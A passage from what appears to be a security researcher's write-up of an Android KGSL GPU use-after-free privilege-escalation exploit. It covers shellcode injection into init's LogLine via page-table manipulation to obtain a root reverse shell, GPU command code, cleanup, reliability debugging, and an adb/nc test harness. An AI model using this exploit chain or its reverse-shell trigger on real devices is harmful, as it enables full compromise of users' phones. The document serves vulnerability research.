  cmd[dw++] = (uint32_t)(new_pte >>32);
  ...

  if(ioctl(fd,IOCTL_KGSL_GPU_COMMAND, &c)==0

Stage 4: Shellcode Injection & Trigger & Recover

  1. Using the 1st PTE, insert shellcode into the code address corresponding to LogLine. read(fd_shellcode,(void *)(gb_target_addr+PAGE_SIZE + 0x2d4),287)
  2. Trigger the preliminary orphan process (child2) prepared in Stage 1, making it an orphan process so that it gets reparented with init as its parent. (code is in Stage 2-1)
  3. After child2 terminates, a SIGCHLD signal occurs, and LogLine is called in init’s signal handler.
  4. Since the LogLine function code has been overwritten with the shellcode, execution flow is hijacked, resulting in a reverse shell (root privileges).
  5. After waiting for time for the shellcode to execute, restore the original LogLine with read(fd_recover,(void *)(gb_target_addr+PAGE_SIZE+0x2d4),287).
  6. Call recover_origin to restore that PTE with the 1st PTE value that was backed up in Stage 3. (Using GPU read/write)
...
split64(base+8, &d_lo, &d_hi);
cmd[dw++] = cp_type7_packet(CP_MEM_WRITE, 3);
cmd[dw++] = d_lo;
cmd[dw++] = d_hi;
cmd[dw++] = (uint32_t)(orig_pte0 & 0xffffffffu);

split64(base + 12, &d_lo, &d_hi);
cmd[dw++] = cp_type7_packet(CP_MEM_WRITE, 3);
cmd[dw++] = d_lo;
cmd[dw++] = d_hi;
cmd[dw++] = (uint32_t)(orig_pte0 >> 32);
...
if (ioctl(fd, IOCTL_KGSL_GPU_COMMAND, &c)
  1. Finally, perform cleanup operations by calling IOCTL_KGSL_GPUOBJ_FREE, munmap, and close.
struct kgsl_gpuobj_free free_req = {0};
if (ph_id) {
    free_req.id = ph_id;
    if (ioctl(fd, IOCTL_KGSL_GPUOBJ_FREE, &free_req) < 0) {
}
if (overlap_id) {
    free_req.id = overlap_id;
    if (ioctl(fd, IOCTL_KGSL_GPUOBJ_FREE, &free_req) < 0) {
}
if (uaf_id) {
    free_req.id = uaf_id;
    if (ioctl(fd, IOCTL_KGSL_GPUOBJ_FREE, &free_req) < 0) {
}

if (overlap_vma && overlap_vma != MAP_FAILED) {
    munmap(overlap_vma, overlap_mmapsize);
}
if (ph_vma && ph_vma != MAP_FAILED) {
    munmap(ph_vma, ph_mmapsize);
}
if (bogus_vma && bogus_vma != MAP_FAILED) {
    munmap(bogus_vma, PAGE_SIZE * 3);
}

5) Reliability & tweak

Issue: PFN manipulation after mmap spray (Write-Back)

  1. After the mmap spray, while reading the PTEs of the discovered page table, the PTE value for the memory region where libbase.so was mapped occasionally appeared as 0.
  2. I initially suspected that the “touch” operation was being optimized away by the compiler, preventing the page fault from occurring. I changed the access to use volatile, but it still failed probabilistically.
  3. Consequently, I dumped the entire page table and observed a situation where some parts were allocated while others remained unallocated.
  4. I suspected that the combination of page #1 being in a corrupted state and the sig_num pages (1, 3, 5, 7, 9) being non-contiguous might be causing this issue. Therefore, I proceeded to allocate pages 0, 2, 4, 6, and 8 as well, and then performed a dump.
  5. Upon failure, the dump revealed that pages 0, 2, 4, 6 formed one coherent block (either allocated together or zeroed together), while page 8 was isolated as a separate block, each showing either allocated or zeroed state independently.
  6. At this point, I strongly sensed that the allocation/zero status was being divided in units of 0x40 bytes.
  7. I recalled that 0x40 is the size of a cache line and that when I perform a dump, the GPU (DMA) accesses the RAM directly. This explained why, despite the page fault definitely occurring (on the CPU), the data in the actual page table (RAM) appeared as zeros in 0x40 byte units (due to cache incoherency).
  8. Since the target was a kernel address, I could not easily use clear_cache. Instead, I simply added a sleep call to induce context switching, expecting the data in the cache to be flushed (written back) to RAM.
  9. Subsequently, the issue was resolved with a near 100% success rate.

Issue: task_struct Not Found

  1. There were instances where the task_struct from the fork spray could not be located, even after scanning all pages within the UAF region. This phenomenon occurred consistently when repeated attempts were made without a system reboot.
  2. Initially, I suspected a cleanup failure was the cause. I rigorously performed munmap and close operations on KGSL-related resources and file descriptors before returning, but this yielded no significant improvement. Even implementing a retry logic to restart the process upon failure resulted in the same “not found” error repeatedly.
  3. I hypothesized that the root cause lay in the slab allocator’s behavior. Since the sprayed task_struct objects are freed at the end of an attempt, a subsequent exploit run simply reuses these recently freed slab cache objects (recycling) rather than allocating a fresh page that corresponds to the UAF-controlled IOMMU region.
  4. To overcome this, I implemented a dynamic spray strategy: the spray count is incremented by 2,000 upon each failure. This ensures that the allocation demand eventually exceeds the size of the previously freed cache, forcing the allocator to fetch new pages, including the target UAF page.
  5. While it would have been more efficient to persist the spray count from the previous run, I considered it architecturally unsound to design an exploit that relies on the state of a prior execution. Therefore, I opted for a stateless approach that increments from the initial value upon every failure, prioritizing reliability and correctness over speed.

Issue: Intermittent Kernel Panic (Root Cause Unknown)

/proc/last_kmsg: <10>[ 426.359341] [0: init:19811] init: ���

  1. The panic likely occurred when Logline() was invoked during an inopportune moment—either while being overwritten with shellcode or during restoration. The corrupted output suggests Logline() was called while in a partially modified state.
  2. Eliminated all orphan processes except the intentionally created one used to trigger Logline()and, this reduced unintended Logline() invocations
  3. Removing Previously used __builtin___clear_cache() after overwriting Logline() reduced panic rate (mechanism unclear)
  4. Fine-tuned various timing parameters including sleep() durations within the exploit and shell termination timing on the reverse shell receiver side, where even minor changes (e.g., only removing echo "ps -ef | grep init" from test code) could disrupt timing and cause zombie processes.

Results

Before fixes: 5% panic rate

After fixes: <1% panic rate

Limitations

The root cause remains unidentified. These are empirical workarounds rather than principled solutions. The exploit is now sufficiently stable for practical use, though the underlying race condition is not fully understood.

Reliability test code

#!/bin/bash
adb push ./exploit /data/local/tmp/ex_test
sleep 1
adb shell "chmod +x /data/local/tmp/ex_test"
echo "start" > out.txt
for j in {1..10}; do
        for i in {1..10}; do
                echo "$j:$i" >> out.txt
                adb shell /data/local/tmp/ex_test &

                (
                        echo "id";
                        echo "ps -ef | grep '0 sh'";
                        echo "ps -ef | grep init";
                        echo "exit"
                ) | adb shell "nc -lp 1337" >> out.txt

                sleep 6
        done
        adb reboot
        echo "reboot"
        sleep 100
done
echo "All compltete"
awk '
/^[0-9]+:[0-9]+$/ { t++ }           
/^uid=0\(root\)/ { s++ }            
END {                             
    if (t > 0)
        printf "success=%d total=%d prob=%.4f\n", s, t, s / t
    else
        print "success=0 total=0 prob=0"
}
' out.txt

Result

All compltete
success=100 total=100 prob=1.0000

out.txt

6) video & exp

video

video

Exploit code

ex.c

7) Reference

https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2023/CVE-2023-33107.html

https://i.blackhat.com/BH-US-23/Presentations/US-23-Lin-bad_io_uring-wp.pdf

https://blackhat.com/docs/us-17/thursday/us-17-Shen-Defeating-Samsung-KNOX-With-Zero-Privilege.pdf

https://soez.github.io/posts/CVE-2022-22265-Samsung-npu-driver/